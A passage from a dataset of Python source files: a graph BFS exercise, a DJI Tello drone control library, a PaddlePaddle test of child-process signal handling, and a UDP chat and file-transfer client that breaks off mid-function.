source
stringlengths 3
86
| python
stringlengths 75
1.04M
|
|---|---|
planetcycles.py
|
from sys import stdin
from collections import defaultdict, deque
from threading import Thread
def bfs(t, graph, visited):
visited[t] = True
# parent[t] = -1
q = deque()
q.append(t)
clen = 0
st = set()
while len(q) > 0:
node = q.popleft()
st.add(node)
clen += 1
for i in graph[node]:
if not visited[i]:
visited[i] = True
q.append(i)
else:
# print(clen, node)
print(clen, node, st)
clen = 0
def main():
n = int(stdin.readline())
graph = defaultdict(list)
i = 1
for u in stdin.readline().split():
graph[i].append(int(u))
i += 1
visited = [False] * (n + 1)
# parent = [-1] * (n + 1)
# bfs(5, graph, visited)
# print("abc")
for t in range(1, n + 1):
if not visited[t]:
st = bfs(t, graph, visited)
print(visited)
Thread(target=main).start()
|
tello.py
|
"""Library for interacting with DJI Ryze Tello drones.
"""
# coding=utf-8
import logging
import json
import socket
import time
from threading import Thread
from typing import Optional, Union, Type, Dict
from datetime import datetime
import cv2 # type: ignore
from .enforce_types import enforce_types
threads_initialized = False
drones: Optional[dict] = {}
client_socket: socket.socket
@enforce_types
class Tello:
"""Python wrapper to interact with the Ryze Tello drone using the official Tello api.
Tello API documentation:
[1.3](https://dl-cdn.ryzerobotics.com/downloads/tello/20180910/Tello%20SDK%20Documentation%20EN_1.3.pdf),
[2.0 with EDU-only commands](https://dl-cdn.ryzerobotics.com/downloads/Tello/Tello%20SDK%202.0%20User%20Guide.pdf)
"""
# Send and receive commands, client socket
RESPONSE_TIMEOUT = 15 # in seconds
TAKEOFF_TIMEOUT = 20 # in seconds
FRAME_GRAB_TIMEOUT = 3
TIME_BTW_COMMANDS = 0.1 # in seconds
TIME_BTW_RC_CONTROL_COMMANDS = 0.001 # in seconds
RETRY_COUNT = 3 # number of retries after a failed command
TELLO_IP = '192.168.10.1' # Tello IP address
# Video stream, server socket
VS_UDP_IP = '0.0.0.0'
VS_UDP_PORT = 11111
CONTROL_UDP_PORT = 8889
STATE_UDP_PORT = 8890
# Constants for video settings
BITRATE_AUTO = 0
BITRATE_1MBPS = 1
BITRATE_2MBPS = 2
BITRATE_3MBPS = 3
BITRATE_4MBPS = 4
BITRATE_5MBPS = 5
RESOLUTION_480P = 'low'
RESOLUTION_720P = 'high'
FPS_5 = 'low'
FPS_15 = 'middle'
FPS_30 = 'high'
CAMERA_FORWARD = 0
CAMERA_DOWNWARD = 1
# Set up logger
HANDLER = logging.StreamHandler()
FORMATTER = logging.Formatter('[%(levelname)s] %(filename)s - %(lineno)d - %(message)s')
HANDLER.setFormatter(FORMATTER)
LOGGER = logging.getLogger('djitellopy')
LOGGER.addHandler(HANDLER)
LOGGER.setLevel(logging.INFO)
# Use Tello.LOGGER.setLevel(logging.<LEVEL>) in YOUR CODE
# to only receive logs of the desired level and higher
# Conversion functions for state protocol fields
INT_STATE_FIELDS = (
# Tello EDU with mission pads enabled only
'mid', 'x', 'y', 'z',
# 'mpry': (custom format 'x,y,z')
# Common entries
'pitch', 'roll', 'yaw',
'vgx', 'vgy', 'vgz',
'templ', 'temph',
'tof', 'h', 'bat', 'time'
)
FLOAT_STATE_FIELDS = ('baro', 'agx', 'agy', 'agz')
state_field_converters: Dict[str, Union[Type[int], Type[float]]]
state_field_converters = {key: int for key in INT_STATE_FIELDS}
state_field_converters.update({key: float for key in FLOAT_STATE_FIELDS})
# VideoCapture object
cap: Optional[cv2.VideoCapture] = None
background_frame_read: Optional['BackgroundFrameRead'] = None
stream_on = False
is_flying = False
def __init__(self,
host=TELLO_IP,
retry_count=RETRY_COUNT):
global threads_initialized, client_socket, drones
self.address = (host, Tello.CONTROL_UDP_PORT)
self.stream_on = False
self.retry_count = retry_count
self.last_received_command_timestamp = time.time()
self.last_rc_control_timestamp = time.time()
if not threads_initialized:
# Run Tello command responses UDP receiver on background
client_socket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
client_socket.bind(('', Tello.CONTROL_UDP_PORT))
response_receiver_thread = Thread(target=Tello.udp_response_receiver)
response_receiver_thread.daemon = True
response_receiver_thread.start()
# Run state UDP receiver on background
state_receiver_thread = Thread(target=Tello.udp_state_receiver)
state_receiver_thread.daemon = True
state_receiver_thread.start()
threads_initialized = True
drones[host] = {'responses': [], 'state': {}}
self.LOGGER.info("Tello instance was initialized. Host: '{}'. Port: '{}'.".format(host, Tello.CONTROL_UDP_PORT))
# add methode get address
def get_address(self):
""" Return tello ip address
"""
return self.address[0]
def get_drones(self):
return drones
def get_own_udp_object(self):
"""Get own object from the global drones dict. This object is filled
with responses and state information by the receiver threads.
Internal method, you normally wouldn't call this yourself.
"""
global drones
host = self.address[0]
return drones[host]
@staticmethod
def udp_response_receiver():
"""Setup drone UDP receiver. This method listens for responses of Tello.
Must be run from a background thread in order to not block the main thread.
Internal method, you normally wouldn't call this yourself.
"""
while True:
try:
data, address = client_socket.recvfrom(1024)
address = address[0]
Tello.LOGGER.debug('Data received from {} at client_socket'.format(address))
if address not in drones:
continue
drones[address]['responses'].append(data)
except Exception as e:
Tello.LOGGER.error(e)
break
@staticmethod
def udp_state_receiver():
"""Setup state UDP receiver. This method listens for state information from
Tello. Must be run from a background thread in order to not block
the main thread.
Internal method, you normally wouldn't call this yourself.
"""
state_socket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
state_socket.bind(("", Tello.STATE_UDP_PORT))
while True:
try:
data, address = state_socket.recvfrom(1024)
address = address[0]
Tello.LOGGER.debug('Data received from {} at state_socket'.format(address))
if address not in drones:
continue
data = data.decode('ASCII')
drones[address]['state'] = Tello.parse_state(data)
except Exception as e:
Tello.LOGGER.error(e)
break
@staticmethod
def parse_state(state: str) -> Dict[str, Union[int, float, str]]:
"""Parse a state line to a dictionary
Internal method, you normally wouldn't call this yourself.
"""
state = state.strip()
Tello.LOGGER.debug('Raw state data: {}'.format(state))
if state == 'ok':
return {}
state_dict = {}
for field in state.split(';'):
split = field.split(':')
if len(split) < 2:
continue
key = split[0]
value: Union[int, float, str] = split[1]
if key in Tello.state_field_converters:
num_type = Tello.state_field_converters[key]
try:
value = num_type(value)
except ValueError as e:
Tello.LOGGER.debug('Error parsing state value for {}: {} to {}'
.format(key, value, num_type))
Tello.LOGGER.error(e)
continue
state_dict[key] = value
return state_dict
def get_current_state_always(self, path):
file_name = "state_history.json"
state_history_file = open(f'{path}/{file_name}', "w")
while self.is_flying:
if self.get_height() > 30:
data = {'ip': self.address[0], 'time': str(datetime.now().time()), 'state': self.get_current_state()}
json.dump(data, state_history_file)
state_history_file.write("\n")
state_history_file.close()
def get_current_state(self) -> dict:
"""Call this function to attain the state of the Tello. Returns a dict
with all fields.
Internal method, you normally wouldn't call this yourself.
"""
return self.get_own_udp_object()['state']
def get_state_field(self, key: str):
"""Get a specific sate field by name.
Internal method, you normally wouldn't call this yourself.
"""
state = self.get_current_state()
if key in state:
return state[key]
else:
raise Exception('Could not get state property: {}'.format(key))
def get_mission_pad_id(self) -> int:
"""Mission pad ID of the currently detected mission pad
Only available on Tello EDUs after calling enable_mission_pads
Returns:
int: -1 if none is detected, else 1-8
"""
return self.get_state_field('mid')
def get_mission_pad_distance_x(self) -> int:
"""X distance to current mission pad
Only available on Tello EDUs after calling enable_mission_pads
Returns:
int: distance in cm
"""
return self.get_state_field('x')
def get_mission_pad_distance_y(self) -> int:
"""Y distance to current mission pad
Only available on Tello EDUs after calling enable_mission_pads
Returns:
int: distance in cm
"""
return self.get_state_field('y')
def get_mission_pad_distance_z(self) -> int:
"""Z distance to current mission pad
Only available on Tello EDUs after calling enable_mission_pads
Returns:
int: distance in cm
"""
return self.get_state_field('z')
def get_pitch(self) -> int:
"""Get pitch in degree
Returns:
int: pitch in degree
"""
return self.get_state_field('pitch')
def get_roll(self) -> int:
"""Get roll in degree
Returns:
int: roll in degree
"""
return self.get_state_field('roll')
def get_yaw(self) -> int:
"""Get yaw in degree
Returns:
int: yaw in degree
"""
return self.get_state_field('yaw')
def get_speed_x(self) -> int:
"""X-Axis Speed
Returns:
int: speed
"""
return self.get_state_field('vgx')
def get_speed_y(self) -> int:
"""Y-Axis Speed
Returns:
int: speed
"""
return self.get_state_field('vgy')
def get_speed_z(self) -> int:
"""Z-Axis Speed
Returns:
int: speed
"""
return self.get_state_field('vgz')
def get_acceleration_x(self) -> float:
"""X-Axis Acceleration
Returns:
float: acceleration
"""
return self.get_state_field('agx')
def get_acceleration_y(self) -> float:
"""Y-Axis Acceleration
Returns:
float: acceleration
"""
return self.get_state_field('agy')
def get_acceleration_z(self) -> float:
"""Z-Axis Acceleration
Returns:
float: acceleration
"""
return self.get_state_field('agz')
def get_lowest_temperature(self) -> int:
"""Get lowest temperature
Returns:
int: lowest temperature (°C)
"""
return self.get_state_field('templ')
def get_highest_temperature(self) -> int:
"""Get highest temperature
Returns:
float: highest temperature (°C)
"""
return self.get_state_field('temph')
def get_temperature(self) -> float:
"""Get average temperature
Returns:
float: average temperature (°C)
"""
templ = self.get_lowest_temperature()
temph = self.get_highest_temperature()
return (templ + temph) / 2
def get_height(self) -> int:
"""Get current height in cm
Returns:
int: height in cm
"""
return self.get_state_field('h')
def get_distance_tof(self) -> int:
"""Get current distance value from TOF in cm
Returns:
int: TOF distance in cm
"""
return self.get_state_field('tof')
def get_barometer(self) -> int:
"""Get current barometer measurement in cm
This resembles the absolute height.
See https://en.wikipedia.org/wiki/Altimeter
Returns:
int: barometer measurement in cm
"""
return self.get_state_field('baro') * 100
def get_flight_time(self) -> int:
"""Get the time the motors have been active in seconds
Returns:
int: flight time in s
"""
return self.get_state_field('time')
def get_battery(self) -> int:
"""Get current battery percentage
Returns:
int: 0-100
"""
return self.get_state_field('bat')
def get_udp_video_address(self) -> str:
"""Internal method, you normally wouldn't call this youself.
"""
address_schema = 'udp://@{ip}:{port}' # + '?overrun_nonfatal=1&fifo_size=5000'
address = address_schema.format(ip=self.VS_UDP_IP, port=self.VS_UDP_PORT)
return address
def get_video_capture(self):
"""Get the VideoCapture object from the camera drone.
Users usually want to use get_frame_read instead.
Returns:
VideoCapture
"""
if self.cap is None:
self.cap = cv2.VideoCapture(self.get_udp_video_address())
if not self.cap.isOpened():
self.cap.open(self.get_udp_video_address())
return self.cap
def get_frame_read(self) -> 'BackgroundFrameRead':
"""Get the BackgroundFrameRead object from the camera drone. Then, you just need to call
backgroundFrameRead.frame to get the actual frame received by the drone.
Returns:
BackgroundFrameRead
"""
if self.background_frame_read is None:
address = self.get_udp_video_address()
self.background_frame_read = BackgroundFrameRead(self, address) # also sets self.cap
self.background_frame_read.start()
return self.background_frame_read
def send_command_with_return(self, command: str, timeout: int = RESPONSE_TIMEOUT) -> str:
"""Send command to Tello and wait for its response.
Internal method, you normally wouldn't call this yourself.
Return:
bool/str: str with response text on success, False when unsuccessfull.
"""
# Commands very consecutive makes the drone not respond to them.
# So wait at least self.TIME_BTW_COMMANDS seconds
diff = time.time() - self.last_received_command_timestamp
if diff < self.TIME_BTW_COMMANDS:
self.LOGGER.debug('Waiting {} seconds to execute command: {}...'.format(diff, command))
time.sleep(diff)
self.LOGGER.info("Send command: '{}'".format(command))
timestamp = time.time()
client_socket.sendto(command.encode('utf-8'), self.address)
responses = self.get_own_udp_object()['responses']
while not responses:
if time.time() - timestamp > timeout:
message = "Aborting command '{}'. Did not receive a response after {} seconds".format(command, timeout)
self.LOGGER.warning(message)
return message
time.sleep(0.1) # Sleep during send command
self.last_received_command_timestamp = time.time()
first_response = responses.pop(0) # first datum from socket
try:
response = first_response.decode("utf-8")
except UnicodeDecodeError as e:
self.LOGGER.error(e)
return "response decode error"
response = response.rstrip("\r\n")
self.LOGGER.info("Response {}: '{}'".format(command, response))
return response
def send_command_without_return(self, command: str):
"""Send command to Tello without expecting a response.
Internal method, you normally wouldn't call this yourself.
"""
# Commands very consecutive makes the drone not respond to them. So wait at least self.TIME_BTW_COMMANDS seconds
self.LOGGER.info("Send command (no response expected): '{}'".format(command))
client_socket.sendto(command.encode('utf-8'), self.address)
def send_control_command(self, command: str, timeout: int = RESPONSE_TIMEOUT) -> bool:
"""Send control command to Tello and wait for its response.
Internal method, you normally wouldn't call this yourself.
"""
response = "max retries exceeded"
for i in range(0, self.retry_count):
response = self.send_command_with_return(command, timeout=timeout)
if 'ok' in response.lower():
return True
self.LOGGER.debug("Command attempt #{} failed for command: '{}'".format(i, command))
self.raise_result_error(command, response)
return False # never reached
def send_read_command(self, command: str) -> str:
"""Send given command to Tello and wait for its response.
Internal method, you normally wouldn't call this yourself.
"""
response = self.send_command_with_return(command)
try:
response = str(response)
except TypeError as e:
self.LOGGER.error(e)
if any(word in response for word in ('error', 'ERROR', 'False')):
self.raise_result_error(command, response)
return "Error: this code should never be reached"
return response
def send_read_command_int(self, command: str) -> int:
"""Send given command to Tello and wait for its response.
Parses the response to an integer
Internal method, you normally wouldn't call this yourself.
"""
response = self.send_read_command(command)
return int(response)
def send_read_command_float(self, command: str) -> float:
"""Send given command to Tello and wait for its response.
Parses the response to an integer
Internal method, you normally wouldn't call this yourself.
"""
response = self.send_read_command(command)
return float(response)
def raise_result_error(self, command: str, response: str) -> bool:
"""Used to reaise an error after an unsuccessful command
Internal method, you normally wouldn't call this yourself.
"""
tries = 1 + self.retry_count
raise Exception("Command '{}' was unsuccessful for {} tries. Latest response:\t'{}'"
.format(command, tries, response))
def connect(self, wait_for_state=True):
"""Enter SDK mode. Call this before any of the control functions.
"""
self.send_control_command("command")
if wait_for_state:
REPS = 20
for i in range(REPS):
if self.get_current_state():
t = i / REPS # in seconds
Tello.LOGGER.debug("'.connect()' received first state packet after {} seconds".format(t))
break
time.sleep(1 / REPS)
if not self.get_current_state():
raise Exception('Did not receive a state packet from the Tello')
def send_keepalive(self):
"""Send a keepalive packet to prevent the drone from landing after 15s
"""
self.send_control_command("keepalive")
def turn_motor_on(self):
"""Turn on motors without flying (mainly for cooling)
"""
self.send_control_command("motoron")
def turn_motor_off(self):
"""Turns off the motor cooling mode
"""
self.send_control_command("motoroff")
def initiate_throw_takeoff(self):
"""Allows you to take off by throwing your drone within 5 seconds of this command
"""
self.send_control_command("throwfly")
def takeoff(self):
"""Automatic takeoff.
"""
# Something it takes a looooot of time to take off and return a succesful takeoff.
# So we better wait. Otherwise, it would give us an error on the following calls.
self.send_control_command("takeoff", timeout=Tello.TAKEOFF_TIMEOUT)
self.is_flying = True
def land(self):
"""Automatic landing.
"""
self.send_control_command("land")
self.is_flying = False
def streamon(self):
"""Turn on video streaming. Use `tello.get_frame_read` afterwards.
Video Streaming is supported on all tellos when in AP mode (i.e.
when your computer is connected to Tello-XXXXXX WiFi ntwork).
Currently Tello EDUs do not support video streaming while connected
to a WiFi-network.
!!! Note:
If the response is 'Unknown command' you have to update the Tello
firmware. This can be done using the official Tello app.
"""
self.send_control_command("streamon")
self.stream_on = True
def streamoff(self):
"""Turn off video streaming.
"""
self.send_control_command("streamoff")
self.stream_on = False
def emergency(self):
"""Stop all motors immediately.
"""
self.send_control_command("emergency")
def move(self, direction: str, x: int):
"""Tello fly up, down, left, right, forward or back with distance x cm.
Users would normally call one of the move_x functions instead.
Arguments:
direction: up, down, left, right, forward or back
x: 20-500
"""
self.send_control_command("{} {}".format(direction, x))
def move_up(self, x: int):
"""Fly x cm up.
Arguments:
x: 20-500
"""
self.move("up", x)
def move_down(self, x: int):
"""Fly x cm down.
Arguments:
x: 20-500
"""
self.move("down", x)
def move_left(self, x: int):
"""Fly x cm left.
Arguments:
x: 20-500
"""
self.move("left", x)
def move_right(self, x: int):
"""Fly x cm right.
Arguments:
x: 20-500
"""
self.move("right", x)
def move_forward(self, x: int):
"""Fly x cm forward.
Arguments:
x: 20-500
"""
self.move("forward", x)
def move_back(self, x: int):
"""Fly x cm backwards.
Arguments:
x: 20-500
"""
self.move("back", x)
def rotate_clockwise(self, x: int):
"""Rotate x degree clockwise.
Arguments:
x: 1-360
"""
self.send_control_command("cw {}".format(x))
def rotate_counter_clockwise(self, x: int):
"""Rotate x degree counter-clockwise.
Arguments:
x: 1-3600
"""
self.send_control_command("ccw {}".format(x))
def flip(self, direction: str):
"""Do a flip maneuver.
Users would normally call one of the flip_x functions instead.
Arguments:
direction: l (left), r (right), f (forward) or b (back)
"""
self.send_control_command("flip {}".format(direction))
def flip_left(self):
"""Flip to the left.
"""
self.flip("l")
def flip_right(self):
"""Flip to the right.
"""
self.flip("r")
def flip_forward(self):
"""Flip forward.
"""
self.flip("f")
def flip_back(self):
"""Flip backwards.
"""
self.flip("b")
def go_xyz_speed(self, x: int, y: int, z: int, speed: int):
"""Fly to x y z relative to the current position.
Speed defines the traveling speed in cm/s.
Arguments:
x: -500-500
y: -500-500
z: -500-500
speed: 10-100
"""
cmd = 'go {} {} {} {}'.format(x, y, z, speed)
self.send_control_command(cmd)
def curve_xyz_speed(self, x1: int, y1: int, z1: int, x2: int, y2: int, z2: int, speed: int):
"""Fly to x2 y2 z2 in a curve via x2 y2 z2. Speed defines the traveling speed in cm/s.
- Both points are relative to the current position
- The current position and both points must form a circle arc.
- If the arc radius is not within the range of 0.5-10 meters, it raises an Exception
- x1/x2, y1/y2, z1/z2 can't both be between -20-20 at the same time, but can both be 0.
Arguments:
x1: -500-500
x2: -500-500
y1: -500-500
y2: -500-500
z1: -500-500
z2: -500-500
speed: 10-60
"""
cmd = 'curve {} {} {} {} {} {} {}'.format(x1, y1, z1, x2, y2, z2, speed)
self.send_control_command(cmd)
def go_xyz_speed_mid(self, x: int, y: int, z: int, speed: int, mid: int):
"""Fly to x y z relative to the mission pad with id mid.
Speed defines the traveling speed in cm/s.
Arguments:
x: -500-500
y: -500-500
z: -500-500
speed: 10-100
mid: 1-8
"""
cmd = 'go {} {} {} {} m{}'.format(x, y, z, speed, mid)
self.send_control_command(cmd)
def curve_xyz_speed_mid(self, x1: int, y1: int, z1: int, x2: int, y2: int, z2: int, speed: int, mid: int):
"""Fly to x2 y2 z2 in a curve via x2 y2 z2. Speed defines the traveling speed in cm/s.
- Both points are relative to the mission pad with id mid.
- The current position and both points must form a circle arc.
- If the arc radius is not within the range of 0.5-10 meters, it raises an Exception
- x1/x2, y1/y2, z1/z2 can't both be between -20-20 at the same time, but can both be 0.
Arguments:
x1: -500-500
y1: -500-500
z1: -500-500
x2: -500-500
y2: -500-500
z2: -500-500
speed: 10-60
mid: 1-8
"""
cmd = 'curve {} {} {} {} {} {} {} m{}'.format(x1, y1, z1, x2, y2, z2, speed, mid)
self.send_control_command(cmd)
def go_xyz_speed_yaw_mid(self, x: int, y: int, z: int, speed: int, yaw: int, mid1: int, mid2: int):
"""Fly to x y z relative to mid1.
Then fly to 0 0 z over mid2 and rotate to yaw relative to mid2's rotation.
Speed defines the traveling speed in cm/s.
Arguments:
x: -500-500
y: -500-500
z: -500-500
speed: 10-100
yaw: -360-360
mid1: 1-8
mid2: 1-8
"""
cmd = 'jump {} {} {} {} {} m{} m{}'.format(x, y, z, speed, yaw, mid1, mid2)
self.send_control_command(cmd)
def enable_mission_pads(self):
"""Enable mission pad detection
"""
self.send_control_command("mon")
def disable_mission_pads(self):
"""Disable mission pad detection
"""
self.send_control_command("moff")
def set_mission_pad_detection_direction(self, x):
"""Set mission pad detection direction. enable_mission_pads needs to be
called first. When detecting both directions detecting frequency is 10Hz,
otherwise the detection frequency is 20Hz.
Arguments:
x: 0 downwards only, 1 forwards only, 2 both directions
"""
self.send_control_command("mdirection {}".format(x))
def set_speed(self, x: int):
"""Set speed to x cm/s.
Arguments:
x: 10-100
"""
self.send_control_command("speed {}".format(x))
def send_rc_control(self, left_right_velocity: int, forward_backward_velocity: int, up_down_velocity: int,
yaw_velocity: int):
"""Send RC control via four channels. Command is sent every self.TIME_BTW_RC_CONTROL_COMMANDS seconds.
Arguments:
left_right_velocity: -100~100 (left/right)
forward_backward_velocity: -100~100 (forward/backward)
up_down_velocity: -100~100 (up/down)
yaw_velocity: -100~100 (yaw)
"""
def clamp100(x: int) -> int:
return max(-100, min(100, x))
if time.time() - self.last_rc_control_timestamp > self.TIME_BTW_RC_CONTROL_COMMANDS:
self.last_rc_control_timestamp = time.time()
cmd = 'rc {} {} {} {}'.format(
clamp100(left_right_velocity),
clamp100(forward_backward_velocity),
clamp100(up_down_velocity),
clamp100(yaw_velocity)
)
self.send_command_without_return(cmd)
def set_wifi_credentials(self, ssid: str, password: str):
"""Set the Wi-Fi SSID and password. The Tello will reboot afterwords.
"""
cmd = 'wifi {} {}'.format(ssid, password)
self.send_control_command(cmd)
def connect_to_wifi(self, ssid: str, password: str):
"""Connects to the Wi-Fi with SSID and password.
After this command the tello will reboot.
Only works with Tello EDUs.
"""
cmd = 'ap {} {}'.format(ssid, password)
self.send_control_command(cmd)
def set_network_ports(self, state_packet_port: int, video_stream_port: int):
"""Sets the ports for state packets and video streaming
While you can use this command to reconfigure the Tello this library currently does not support
non-default ports (TODO!)
"""
cmd = 'port {} {}'.format(state_packet_port, video_stream_port)
self.send_control_command(cmd)
def reboot(self):
"""Reboots the drone
"""
self.send_command_without_return('reboot')
def set_video_bitrate(self, bitrate: int):
"""Sets the bitrate of the video stream
Use one of the following for the bitrate argument:
Tello.BITRATE_AUTO
Tello.BITRATE_1MBPS
Tello.BITRATE_2MBPS
Tello.BITRATE_3MBPS
Tello.BITRATE_4MBPS
Tello.BITRATE_5MBPS
"""
cmd = 'setbitrate {}'.format(bitrate)
self.send_control_command(cmd)
def set_video_resolution(self, resolution: str):
"""Sets the resolution of the video stream
Use one of the following for the resolution argument:
Tello.RESOLUTION_480P
Tello.RESOLUTION_720P
"""
cmd = 'setresolution {}'.format(resolution)
self.send_control_command(cmd)
def set_video_fps(self, fps: str):
"""Sets the frames per second of the video stream
Use one of the following for the fps argument:
Tello.FPS_5
Tello.FPS_15
Tello.FPS_30
"""
cmd = 'setfps {}'.format(fps)
self.send_control_command(cmd)
def set_video_direction(self, direction: int):
"""Selects one of the two cameras for video streaming
The forward camera is the regular 1080x720 color camera
The downward camera is a grey-only 320x240 IR-sensitive camera
Use one of the following for the direction argument:
Tello.CAMERA_FORWARD
Tello.CAMERA_DOWNWARD
"""
cmd = 'downvision {}'.format(direction)
self.send_control_command(cmd)
def send_expansion_command(self, expansion_cmd: str):
"""Sends a command to the ESP32 expansion board connected to a Tello Talent
Use e.g. tello.send_expansion_command("led 255 0 0") to turn the top led red.
"""
cmd = 'EXT {}'.format(expansion_cmd)
self.send_control_command(cmd)
def query_speed(self) -> int:
"""Query speed setting (cm/s)
Returns:
int: 1-100
"""
return self.send_read_command_int('speed?')
def query_battery(self) -> int:
"""Get current battery percentage via a query command
Using get_battery is usually faster
Returns:
int: 0-100 in %
"""
return self.send_read_command_int('battery?')
def query_flight_time(self) -> int:
"""Query current fly time (s).
Using get_flight_time is usually faster.
Returns:
int: Seconds elapsed during flight.
"""
return self.send_read_command_int('time?')
def query_height(self) -> int:
"""Get height in cm via a query command.
Using get_height is usually faster
Returns:
int: 0-3000
"""
return self.send_read_command_int('height?')
def query_temperature(self) -> int:
"""Query temperature (°C).
Using get_temperature is usually faster.
Returns:
int: 0-90
"""
return self.send_read_command_int('temp?')
def query_attitude(self) -> dict:
"""Query IMU attitude data.
Using get_pitch, get_roll and get_yaw is usually faster.
Returns:
{'pitch': int, 'roll': int, 'yaw': int}
"""
response = self.send_read_command('attitude?')
return Tello.parse_state(response)
def query_barometer(self) -> int:
"""Get barometer value (cm)
Using get_barometer is usually faster.
Returns:
int: 0-100
"""
baro = self.send_read_command_int('baro?')
return baro * 100
def query_distance_tof(self) -> float:
"""Get distance value from TOF (cm)
Using get_distance_tof is usually faster.
Returns:
float: 30-1000
"""
# example response: 801mm
tof = self.send_read_command('tof?')
return int(tof[:-2]) / 10
def query_wifi_signal_noise_ratio(self) -> str:
"""Get Wi-Fi SNR
Returns:
str: snr
"""
return self.send_read_command('wifi?')
def query_sdk_version(self) -> str:
"""Get SDK Version
Returns:
str: SDK Version
"""
return self.send_read_command('sdk?')
def query_serial_number(self) -> str:
"""Get Serial Number
Returns:
str: Serial Number
"""
return self.send_read_command('sn?')
def query_active(self) -> str:
"""Get the active status
Returns:
str
"""
return self.send_read_command('active?')
def end(self):
"""Call this method when you want to end the tello object
"""
if self.is_flying:
self.land()
if self.stream_on:
self.streamoff()
if self.background_frame_read is not None:
self.background_frame_read.stop()
if self.cap is not None:
self.cap.release()
host = self.address[0]
if host in drones:
del drones[host]
def __del__(self):
self.end()
class BackgroundFrameRead:
"""
This class read frames from a VideoCapture in background. Use
backgroundFrameRead.frame to get the current frame.
"""
def __init__(self, tello, address):
tello.cap = cv2.VideoCapture(address)
self.cap = tello.cap
if not self.cap.isOpened():
self.cap.open(address)
# Try grabbing a frame multiple times
# According to issue #90 the decoder might need some time
# https://github.com/damiafuentes/DJITelloPy/issues/90#issuecomment-855458905
start = time.time()
while time.time() - start < Tello.FRAME_GRAB_TIMEOUT:
Tello.LOGGER.debug('trying to grab a frame...')
self.grabbed, self.frame = self.cap.read()
if self.frame is not None:
break
time.sleep(0.05)
if not self.grabbed or self.frame is None:
raise Exception('Failed to grab first frame from video stream')
self.stopped = False
self.worker = Thread(target=self.update_frame, args=(), daemon=True)
def start(self):
"""Start the frame update worker
Internal method, you normally wouldn't call this yourself.
"""
self.worker.start()
def update_frame(self):
"""Thread worker function to retrieve frames from a VideoCapture
Internal method, you normally wouldn't call this yourself.
"""
while not self.stopped:
if not self.grabbed or not self.cap.isOpened():
self.stop()
else:
self.grabbed, self.frame = self.cap.read()
def stop(self):
"""Stop the frame update worker
Internal method, you normally wouldn't call this yourself.
"""
self.stopped = True
self.worker.join()
|
test_imperative_signal_handler.py
|
# Copyright (c) 2019 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
import sys
import signal
import unittest
import multiprocessing
import time
import paddle.compat as cpt
from paddle.fluid import core
def set_child_signal_handler(self, child_pid):
core._set_process_pids(id(self), tuple([child_pid]))
current_handler = signal.getsignal(signal.SIGCHLD)
if not callable(current_handler):
current_handler = None
def __handler__(signum, frame):
core._throw_error_if_process_failed()
if current_handler is not None:
current_handler(signum, frame)
signal.signal(signal.SIGCHLD, __handler__)
class TestDygraphDataLoaderSingalHandler(unittest.TestCase):
def test_child_process_exit_with_error(self):
def __test_process__():
core._set_process_signal_handler()
sys.exit(1)
def try_except_exit():
exception = None
try:
test_process = multiprocessing.Process(target=__test_process__)
test_process.start()
set_child_signal_handler(id(self), test_process.pid)
time.sleep(5)
except SystemError as ex:
self.assertIn("Fatal", cpt.get_exception_message(ex))
exception = ex
return exception
try_time = 10
exception = None
for i in range(try_time):
exception = try_except_exit()
if exception is not None:
break
self.assertIsNotNone(exception)
def test_child_process_killed_by_sigsegv(self):
def __test_process__():
core._set_process_signal_handler()
os.kill(os.getpid(), signal.SIGSEGV)
def try_except_exit():
exception = None
try:
test_process = multiprocessing.Process(target=__test_process__)
test_process.start()
set_child_signal_handler(id(self), test_process.pid)
time.sleep(5)
except SystemError as ex:
self.assertIn("Segmentation fault",
cpt.get_exception_message(ex))
exception = ex
return exception
try_time = 10
exception = None
for i in range(try_time):
exception = try_except_exit()
if exception is not None:
break
self.assertIsNotNone(exception)
def test_child_process_killed_by_sigbus(self):
def __test_process__():
core._set_process_signal_handler()
os.kill(os.getpid(), signal.SIGBUS)
def try_except_exit():
exception = None
try:
test_process = multiprocessing.Process(target=__test_process__)
test_process.start()
set_child_signal_handler(id(self), test_process.pid)
time.sleep(5)
except SystemError as ex:
self.assertIn("Bus error", cpt.get_exception_message(ex))
exception = ex
return exception
try_time = 10
exception = None
for i in range(try_time):
exception = try_except_exit()
if exception is not None:
break
self.assertIsNotNone(exception)
def test_child_process_killed_by_sigterm(self):
def __test_process__():
core._set_process_signal_handler()
time.sleep(10)
test_process = multiprocessing.Process(target=__test_process__)
test_process.daemon = True
test_process.start()
set_child_signal_handler(id(self), test_process.pid)
time.sleep(1)
if __name__ == '__main__':
unittest.main()
|
client_udp2.py
|
import os
import socket
import threading
from tzlocal import get_localzone
code_table = 'utf-8'
name = input("Username. No more then 16 symbols: ")
if len(name) > 16:
print("No more then 16 symbols, try again")
name = input("Username: ")
hostS = 'networkslab-ivt.ftp.sh'
hostL = '127.0.0.1'
port = 55555
file_end = '37e3f4a8-b8c9-4f22-ad4d-8bd81e686822'
length_of_message = len(f"file{file_end}")
client = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
client.connect((hostL, 55555))
lenght = 65535
making_connection = False
def receive_message():
while True:
full_mes = ''.encode(code_table)
message = ''.encode(code_table)
message, address = client.recvfrom(lenght)
full_mes += message
while not file_end.encode(code_table) in full_mes:
message, address = client.recvfrom(lenght)
full_mes += message
else:
print(full_mes[:full_mes.find(file_end.encode(code_table))].decode(code_table))
buffer = 0
def send_message():
global making_connection
while True:
if not making_connection:
client.sendto(bytearray(1), (hostL, port))
print(f'client with name {name} connected ')
making_connection = True
local_tz = get_localzone()
message = input("") + file_end
if message == f"file{file_end}":
file_name = input("Type file name: ")
file_size = os.path.getsize(file_name) + len(file_end.encode(code_table))
client.sendto(f"{message}".encode(code_table), (hostL, port))
file_name_size = f"{file_name}<>{file_size}".encode()
client.sendto(f"{len(file_name_size):<{length_of_message}}".encode(code_table), (hostL, port))
client.sendto(file_name_size, (hostL, port))
f = open(file_name, "rb")
file_data_write = f.read(lenght - len(file_end.encode(code_table)) - 1)
mod_data_to_send = file_data_write + file_end.encode(code_table)
